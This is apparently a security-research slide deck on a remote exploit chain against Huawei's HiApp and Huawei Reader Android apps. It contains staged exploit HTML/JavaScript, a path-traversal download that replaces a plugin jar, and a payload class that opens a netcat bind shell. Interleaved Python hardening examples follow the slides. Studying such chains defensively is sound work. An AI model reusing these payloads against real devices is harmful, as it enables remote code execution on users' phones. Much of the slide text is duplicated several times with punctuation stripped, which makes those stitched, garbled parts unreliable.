            this.a.clear();
            // Host allow-list expressed as suffix regexes
            this.a.add("hicloud.com$");
            this.a.add("vmall.com$");
            this.a.add("huawei.com$");
            Iterator v1 = com.huawei.appmarket.service.whitelist.b.a().iterator();
            do {
                if (v1.hasNext()) {
                    if (v1.next().booleanValue()) {
                        continue;
                    }
                    // ... (remainder not shown on the slide)
HiApp – stage1.html (CVE-2018-7931)

    document.location = 'hiapp://com.huawei.appmarket?activityName=activityUri|webview.activity&params={"params":[{"name":"uri","type":"String","value":"internal_webview"},{"name":"url","type":"String","value":"http://www.vmall.com:8000/stage2.html"}]}&channelId=1';

Stage 1

    Browse to Website on Device -> BROWSABLE Intent - WebView -> Code Exec and Profit
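The allow-list on the previous slide is three host suffix regexes, and the stage-1 URL that satisfies it is plain http on port 8000. The following Python is an added example (my code, not MWR's or the app's) that puts a check shaped like the slide's next to a stricter one. It assumes the patterns are applied with a regex search against the URL host, since the matching code itself is not on the slide; apart from the stage-1 URL, the sample inputs are constructed.

```python
import re
from urllib.parse import urlsplit

# The three entries from the whitelist slide: suffix regexes with no left anchor
# and an unescaped "." (assumption: they are applied with a regex search over the host).
SLIDE_PATTERNS = ["hicloud.com$", "vmall.com$", "huawei.com$"]

# Registrable domains the list is evidently meant to cover.
ALLOWED_DOMAINS = ("hicloud.com", "vmall.com", "huawei.com")


def slide_style_allow(url):
    """Check shaped like the slide's: regex search over the host, nothing else.

    The scheme and port are never inspected, so plain-http URLs on arbitrary
    ports pass; and with no left anchor any host that merely ends in the right
    characters passes too.
    """
    host = urlsplit(url).hostname or ""
    return any(re.search(pattern, host) for pattern in SLIDE_PATTERNS)


def strict_allow(url):
    """Allow-list check a reviewer would ask for instead.

    Requires https (content cannot be swapped on the network), rejects userinfo
    in the authority, and matches the host against fixed domains on a dot boundary.
    """
    parts = urlsplit(url)
    if parts.scheme != "https" or parts.username is not None:
        return False
    host = (parts.hostname or "").lower().rstrip(".")
    if not host:
        return False
    return any(host == d or host.endswith("." + d) for d in ALLOWED_DOMAINS)


def compare(urls):
    """Return {url: (slide_style_result, strict_result)} for a side-by-side view."""
    return {u: (slide_style_allow(u), strict_allow(u)) for u in urls}


if __name__ == "__main__":
    # Constructed sample inputs; the first one is the stage-1 URL from the slide.
    samples = [
        "http://www.vmall.com:8000/stage2.html",
        "https://evil-vmall.com/",
        "https://a.vmall.com/",
        "https://www.vmall.com@attacker.example/",
    ]
    for url, (loose, strict) in compare(samples).items():
        print(f"{url:45} slide-style={loose!s:5} strict={strict}")
```

The stage-1 URL passes the slide-style check and fails the strict one purely on its scheme; the userinfo case shows why the host must come from a real URL parser rather than a substring search.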
HiApp – JavaScript Bridge (CVE-2018-7932)

    this.webview.getSettings().setJavaScriptEnabled(true);
    this.webview.requestFocus();
    this.webview.setWebViewClient(new InternalWebViewClient(this));
    this.webview.setWebChromeClient(new MarketWebChromeClient(this));
    this.webview.getSettings().setBlockNetworkImage(true);
    // HiSpaceObject is exposed to every page the WebView loads
    this.webview.addJavascriptInterface(new HiSpaceObject(this.mContext, ((JsCallBackOjbect) this), this.webview), "HiSpaceObject");
HiApp – JavaScript Bridge (CVE-2018-7932)

    @JavascriptInterface
    public void launchApp(String arg7, String arg8) {
        URISyntaxException v1_1;
        // arg8 comes straight from page JavaScript and is parsed and started as-is
        v0_1 = Intent.parseUri(arg8, 0);
        try {
            v0_1.setPackage(arg7);
            this.mActivity.startActivity(v0_1);
            // ... (remainder not shown on the slide)
android-app URI Schema

http://androidxref.com/8.0.0_r4/xref/frameworks/base/core/java/android/content/Intent.java

    android-app://package_id[/scheme[/host[/path]]][#Intent;...;end]

    android-app://com.example.app#Intent;action=com.example.MY_ACTION;i.some_int=100;S.some_str=hello;end

    Action:  com.example.MY_ACTION
    Package: com.example.app
    Extras:  some_int=(int)100, some_str=(String)hello
HiApp – stage2.html (CVE-2018-7932)

    var pkg = "com.huawei.hwireader";
    var uri = "android-app://http://www.google.co.uk#Intent;" +
        "component=com.huawei.hwireader/com.zhangyue.iReader.online.ui.ActivityWeb;" +
        "action=com.huawei.hwireader.SHOW_DETAIL;" +
        "S.url=http://192.168.137.1:8000/stage3.html;end";
    window.HiSpaceObject.launchApp(pkg, uri);

Stage 2

    Browse to Website on Device -> BROWSABLE Intent - WebView -> Exported Intent - WebView -> Code Exec and Profit
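The bridge's launchApp hands whatever intent URI the page supplies to Intent.parseUri and starts it, so the web page chooses the component, action and extras of the next stage. As an added example (my code, not the deck's or the app's), here is a Python parser for the android-app:// and intent: grammar from the android-app URI Schema slide, followed by a policy function showing what a bridge could enforce before forwarding anything. The names parse_intent_uri and bridge_policy are mine, the extra type prefixes covered are the subset needed for the slides' URIs, and the two sample URIs are the ones shown on the slides.

```python
from urllib.parse import unquote

# Typed-extra prefixes of the #Intent;...;end fragment (the subset needed here;
# Intent.parseUri also knows b., c. and s.).
EXTRA_TYPES = {
    "S": str,
    "B": lambda v: v.lower() == "true",
    "i": int,
    "l": int,
    "f": float,
    "d": float,
}

# The example URI from the android-app URI Schema slide and the stage-2 URI.
EXAMPLE_URI = ("android-app://com.example.app#Intent;action=com.example.MY_ACTION;"
               "i.some_int=100;S.some_str=hello;end")
STAGE2_URI = ("android-app://http://www.google.co.uk#Intent;"
              "component=com.huawei.hwireader/com.zhangyue.iReader.online.ui.ActivityWeb;"
              "action=com.huawei.hwireader.SHOW_DETAIL;"
              "S.url=http://192.168.137.1:8000/stage3.html;end")


def parse_intent_uri(uri):
    """Parse an android-app:// or intent: URI into package, action, component and typed extras.

    Follows the grammar on the slide: android-app://package_id[/scheme[/host[/path]]][#Intent;...;end].
    Values are percent-decoded as Intent.parseUri does, and an extra without a known
    type prefix is an error there too.
    """
    if uri.startswith("android-app://"):
        body = uri[len("android-app://"):]
        android_app = True
    elif uri.startswith("intent:"):
        body = uri[len("intent:"):]
        android_app = False
    else:
        raise ValueError("not an android-app:// or intent: URI")

    frag_at = body.find("#Intent;")
    data = body if frag_at < 0 else body[:frag_at]
    fragment = "" if frag_at < 0 else body[frag_at + len("#Intent;"):]

    intent = {"package": None, "action": None, "component": None,
              "categories": [], "extras": {}, "data": data}
    if android_app:
        intent["package"] = data.split("/", 1)[0]   # package_id precedes the first "/"

    for field in fragment.split(";"):
        if field == "end":
            break
        if not field:
            continue
        key, sep, value = field.partition("=")
        if not sep:
            raise ValueError(f"malformed field {field!r}")
        value = unquote(value)
        if key == "action":
            intent["action"] = value
        elif key == "package":
            intent["package"] = value
        elif key == "category":
            intent["categories"].append(value)
        elif key == "component":
            pkg, _, cls = value.partition("/")
            if cls.startswith("."):             # relative class name, as ComponentName.unflattenFromString
                cls = pkg + cls
            intent["component"] = (pkg, cls)
        elif key in ("type", "launchFlags", "scheme"):
            intent[key] = value
        elif len(key) > 2 and key[1] == "." and key[0] in EXTRA_TYPES:
            intent["extras"][key[2:]] = EXTRA_TYPES[key[0]](value)
        else:
            raise ValueError(f"unknown EXTRA type in {field!r}")
    return intent


def bridge_policy(expected_pkg, uri):
    """What a launchApp-style bridge could enforce before calling startActivity.

    Forward only implicit intents addressed to the package the bridge is meant to
    open: no explicit component (so page JavaScript cannot pick an arbitrary activity
    inside another app), no package other than the expected one, and an action present.
    Returns (allowed, reason).
    """
    try:
        intent = parse_intent_uri(uri)
    except ValueError as exc:
        return False, f"unparseable: {exc}"
    if intent["component"] is not None:
        return False, "explicit component not allowed from web content"
    if intent["package"] not in (None, expected_pkg):
        return False, "package mismatch"
    if intent["action"] is None:
        return False, "no action"
    return True, "ok"
```

Run against the stage-2 URI the parser recovers the explicit component and the url extra that the next slides rely on, and the policy refuses it on the component alone; the slide's com.example.app URI is an implicit intent and passes.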
Huawei Reader Application

Huawei Reader – Input Validation (CVE-2017-15308)

    protected void onCreate(Bundle arg8) {
        CharSequence v0_1;
        String v0;
        CharSequence v1 = null;
        super.onCreate(arg8);
        Intent v2 = this.getIntent();
        if (v2 != null) {
            Uri v3 = v2.getData();
            if (v3 != null) {
                v0 = v3.getScheme();
            } else {
                v0_1 = v1;
            }
            // The "url" extra of the incoming intent is loaded into the WebView without validation
            v0 = v2.getStringExtra("url");
            if (TextUtils.isEmpty(((CharSequence) v0))) {
                goto label_51;   // decompiler output; the target is not shown on the slide
            }
            this.loadRefreshUrl(v0);
Huawei Reader – Input Validation (CVE-2017-15308)

    @JavascriptInterface
    public void do_command(String arg9) {
        // ... arg9 is parsed into the JSONObject v2_3 (not shown on the slide)
        String v4 = ((JSONObject) v2_3).getString("Action");
        LOG.I("js actionName " + v4);
        JSONObject v5 = ((JSONObject) v2_3).getJSONObject("Data");
        if (v4.equalsIgnoreCase("onlineReader")) {
            JSProtocol.mJSBookProtocol.online(v5);
            return;
        }
        if (v4.equalsIgnoreCase("readNow")) {
            JSProtocol.mJSBookProtocol.readNow(v5);
            return;
        }
Huawei Reader – Arbitrary Write Directory Traversal (CVE-2017-15309)

    public void originalDownload(JSONObject arg19, boolean arg20, boolean arg21) {
        // ... v7 holds the "DownloadInfo" object from the JSON (not shown on the slide)
        v8 = 0;
        v10 = v4;
        v4_1 = 0;
        try {
            int v13 = v7.getInt("Type");
            v14 = v7.optInt("Version");
            v15 = v7.optBoolean("getDrmAuth", true);
            // Caller-controlled FileName is concatenated straight onto the book directory
            v3 = PATH.getBookDir() + v7.getString("FileName");
            v2 = v7.getInt("FileId");
            v6 = v7.getString("DownloadUrl");
Huawei Reader – Arbitrary Write Directory Traversal (CVE-2017-15309)

    function download_plugin() {
        var json = '{"Action":"onlineReader","Data":{"ChargingFeeType":0,' +
            '"OrderUrl":"http://192.168.137.1:8001/aaaaa","Price":0,' +
            '"DownloadInfo":{"ChapterId":1,"FeeUnit":10,"Type":1,"FileId":32532639,' +
            '"FileName":"plugins/DFService/classes.jar","FileSize":10000000,' +
            '"Ebk3DownloadUrl":"https://s3-ap-northeast-1.amazonaws.com/4aaaaaa9q84q87reertw35wy5/test.zip",' +
            '"DownloadUrl":"https://s3-ap-northeast-1.amazonaws.com/k4aaaaaaertw35wy5/test.zip","Version":2}}}';
        window.ZhangYueJS.do_command(json);
    }

Stage 3

    Browse to Website on Device -> BROWSABLE Intent - WebView -> Exported Intent - WebView -> File Write -> Code Exec and Profit
Huawei Reader – Arbitrary Delete (CVE-2017-15310)

    public boolean onChapPack(JSONObject arg10) {
        boolean v0_2;
        try {
            int v3 = arg10.getInt("StartIndex");
            int v4 = arg10.getInt("EndIndex");
            String v2 = arg10.getString("Price");
            int v1 = arg10.getInt("BookId");
            String v5 = arg10.getString("PayURL");
            String v0_1 = arg10.getString("DownloadURL");
            // Same unchecked concatenation as in originalDownload
            String v7 = PATH.getBookDir() + arg10.getString("FileName");
            // The file is deleted whenever its "openfail" marker exists and the net type is not -1
            if ((FILE.isExist(PATH.getBookNameCheckOpenFail(v7))) && Device.getNetType() != 0xFFFFFFFF) {
                FILE.delete(PATH.getBookCachePathNamePostfix(v7));
                FILE.delete(v7);
Huawei Reader – Arbitrary Delete (CVE-2017-15310)

    public static String getBookNameCheckOpenFail(String arg2) {
        return PATH.getOpenFailDir() + MD5.getMD5(arg2);
    }

    public static String getOpenFailDir() {
        return PATH.getWorkDir() + "books/openfail/";
    }
Huawei Reader – Arbitrary Delete (CVE-2017-15310)

    5457bea93d0548a4d84357308df45322 = plugins/DFService/classes.jar
    /sdcard/HWiReader/books/openfail/5457bea93d0548a4d84357308df45322
    /sdcard/HWiReader/books/plugins/DFService/classes.jar
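The Arbitrary Write and Arbitrary Delete slides both hinge on PATH.getBookDir() + FileName being trusted, and the Insecure Plugin Loading slides on the plugin jar being loaded from that writable, external-storage location with no check on its contents. The following Python is an added example (my code, not the app's or MWR's) of the two checks a fix needs: a resolver that accepts only a bare file name that stays inside the book directory, and a loader gate that refuses a plugin jar outside app-private storage or whose SHA-256 differs from a pinned value. The directory layout, jar bytes and pinned digest are constructed here, the pinned digest stands in for whatever trust anchor the app would ship with, and book_path and plugin_load_allowed are names of mine.

```python
import hashlib
import hmac
import os
import tempfile


def book_path(book_dir, file_name):
    """Resolve the target of a book download or delete safely.

    The slides build PATH.getBookDir() + FileName with FileName taken from the JSON.
    Here FileName must be a bare file name (no separators, not "." or "..") and the
    resolved path must still lie inside book_dir once symlinks are followed.
    Returns the absolute path, or None if either check fails.
    """
    if not file_name or file_name in (".", "..") or any(sep in file_name for sep in ("/", "\\", os.sep)):
        return None
    base = os.path.realpath(book_dir)
    target = os.path.realpath(os.path.join(base, file_name))
    if os.path.commonpath([base, target]) != base:
        return None
    return target


def plugin_load_allowed(jar_path, private_dir, pinned_sha256):
    """Gate for a DexClassLoader-style load of a plugin jar.

    The jar must live under the app-private directory (not external storage) and its
    SHA-256 must match a value pinned in the app. pinned_sha256 stands in for whatever
    trust anchor the app would ship with (assumption). Returns (allowed, reason).
    """
    base = os.path.realpath(private_dir)
    jar = os.path.realpath(jar_path)
    if os.path.commonpath([base, jar]) != base:
        return False, "plugin outside app-private storage"
    with open(jar, "rb") as f:
        actual = hashlib.sha256(f.read()).hexdigest()
    if not hmac.compare_digest(actual, pinned_sha256):
        return False, "plugin digest mismatch"
    return True, "ok"


def demo():
    """Constructed layout: <work>/books for downloads, <work>/data/plugins/DFService/classes.jar for the plugin."""
    results = {}
    with tempfile.TemporaryDirectory() as work:
        books = os.path.join(work, "books")
        private = os.path.join(work, "data")
        plugin_dir = os.path.join(private, "plugins", "DFService")
        os.makedirs(books)
        os.makedirs(plugin_dir)

        jar = os.path.join(plugin_dir, "classes.jar")
        good = b"PK\x03\x04 constructed plugin bytes"   # stand-in for a real jar
        with open(jar, "wb") as f:
            f.write(good)
        pinned = hashlib.sha256(good).hexdigest()

        # FileName values: a legitimate book, and two that aim at the plugin jar
        results["book_ok"] = book_path(books, "book.epub") is not None
        results["subdir_rejected"] = book_path(books, "plugins/DFService/classes.jar") is None
        results["traversal_rejected"] = book_path(books, "../data/plugins/DFService/classes.jar") is None

        # Plugin in place with the pinned digest: load allowed
        results["plugin_ok"] = plugin_load_allowed(jar, private, pinned)

        # Replace the jar bytes, as the download stage on the slides does: load refused
        with open(jar, "wb") as f:
            f.write(b"PK\x03\x04 replaced bytes")
        results["replaced_rejected"] = plugin_load_allowed(jar, private, pinned)

        # The good bytes, but under an external path: refused on location alone
        external = os.path.join(work, "sdcard")
        os.makedirs(external)
        ext_jar = os.path.join(external, "classes.jar")
        with open(ext_jar, "wb") as f:
            f.write(good)
        results["external_rejected"] = plugin_load_allowed(ext_jar, private, pinned)
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:20} {value}")
```

The two checks are independent on purpose: every path on the slides sits under /sdcard/HWiReader, so confining FileName to the book directory stops the write and the delete from reaching anything else, while the loader-side digest check is what makes a swapped classes.jar fail even if some other route put it in place.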
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
